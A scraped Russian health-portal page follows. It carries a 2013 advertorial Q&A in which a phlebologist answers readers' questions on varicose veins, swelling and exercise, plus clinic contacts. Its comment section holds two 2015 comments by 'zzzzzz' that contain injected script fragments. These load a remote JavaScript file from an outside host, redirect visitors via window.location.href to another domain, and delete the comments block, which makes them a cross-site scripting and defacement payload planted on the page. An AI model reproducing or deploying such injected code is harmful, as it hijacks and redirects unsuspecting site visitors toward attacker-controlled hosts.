Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Популярные вопросы  >>  Популярные вопросы
 
Обратная связь
 

Популярные вопросы

Размер шрифта
08 октября 2013 00:00
  • google_analytics: false
  • Нравится

На вопросы читателей отвечает Главный врач клиники «Центр Флебологии», хирург-флеболог Чупеев Андрей Васильевич.

Популярные вопросы

Вопрос: Скажите, пожалуйста, можно ли вылечить варикоз без операции?

Ответ: В настоящее время существует несколько способов лечения варикозной болезни, в том числе оперативные и безоперационных методов хорошо себя зарекомендовали склеротерапия (уколы) в разных вариантах и тепловые методы (лазерная коагуляция и радиочастотная абляция). В большинстве случаев эти методы позволяют избавить пациента от варикозных вен без госпитализации и наркоза. Чем раньше пациент обращается к флебологу за помощью, тем больше возможностей избежать операции.

Вопрос: Скажите, пожалуйста, зачем нужна диагностика, если на моих ногах варикозно-расширенные вены и так хорошо видны? Разве флеболог не может назначить лечение по результатам обычного осмотра?

Ответ: Внешнее проявление варикозного расширения вен нижних конечностей, как правило, не отражает всех изменений в подкожных венах. Ведь большинство крупных подкожных вен лежит глубже поверхности кожи, и внешне они могут быть не видны. Точная диагностика и постановка правильного диагноза-это половина успешного лечения. В нашем Центре ультразвуковая диагностика проводится на первом приеме совместно с консультацией врача флеболога. Это позволяет поставить точный диагноз и назначить адекватное лечение в каждом индивидуальном случае.

Вопрос: В последнее время я заметила, что у меня ноги стали часто отекать. С чем это связано и надо ли проводить лечение?

Ответ: Часто отек появляется после длительной статической нагрузки (перелет в самолете, длительное нахождение в положении сидя или стоя на ногах), что и вызывает венозный застой. После ночного отдыха все симптомы исчезают. Этот отек не требует специального лечения, так как он не связан с какими-либо заболеваниями. Для профилактики заболевания вен и чтобы помочь свои ногам нужно стараться больше двигаться, заниматься спортом и носить специальный компрессионный трикотаж, который правильно поможет подобрать врач флеболог.

Также отеки ног могут возникать из-за нарушения работы сердца, почек, венозной или лимфатической системы. Если отек связан с варикозной болезнью, то он, как правило, проявляется в виде следа от резинки носочков и захватывает голень, стопу, но при этом он более равномерный. В этом случае вам следует обратиться к врачу флебологу.

Вопрос: Я занимаюсь фитнесом, но после пробежек и силовой нагрузки у меня опухают вены, побаливают. Стоит ли мне при таких симптомах заниматься фитнесом, если да, то какие нагрузки не повредят?

Ответ: При варикозном расширении вен противопоказаны статические нагрузки, занятия на тренажёрах с отягощениями. Не рекомендуется и степ-аэробика. Предпочтительны динамические нагрузки в умеренном режиме, кардиотренировки. Прекрасно подходят для пациентов с варикозом плавание, аквааэробика и т.д. Заниматься спортом необходимо в компрессионном трикотаже, рекомендованном флебологом (вид изделия и класс компрессии).

«Центр Флебологии» – специализированная клиника по лечению варикоза.

ЗАО «Центр Флебологии»

м. Спортивная

м. Смоленская

м. Бауманская

(495) 212-93-03

www.varikoz.ru

Лицензия ЛО-39-01 000818 от 29.12.12 г.

Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:01

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:59

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
5 заблуждений о варикозе   Как избавиться от варикозных вен?   Как предотвратить варикоз   Если ноги отекают?  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Как сохранить красоту ног?
Как избавиться от варикоза. Лазер
Варикоз. Как предотвратить? Как избавиться?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.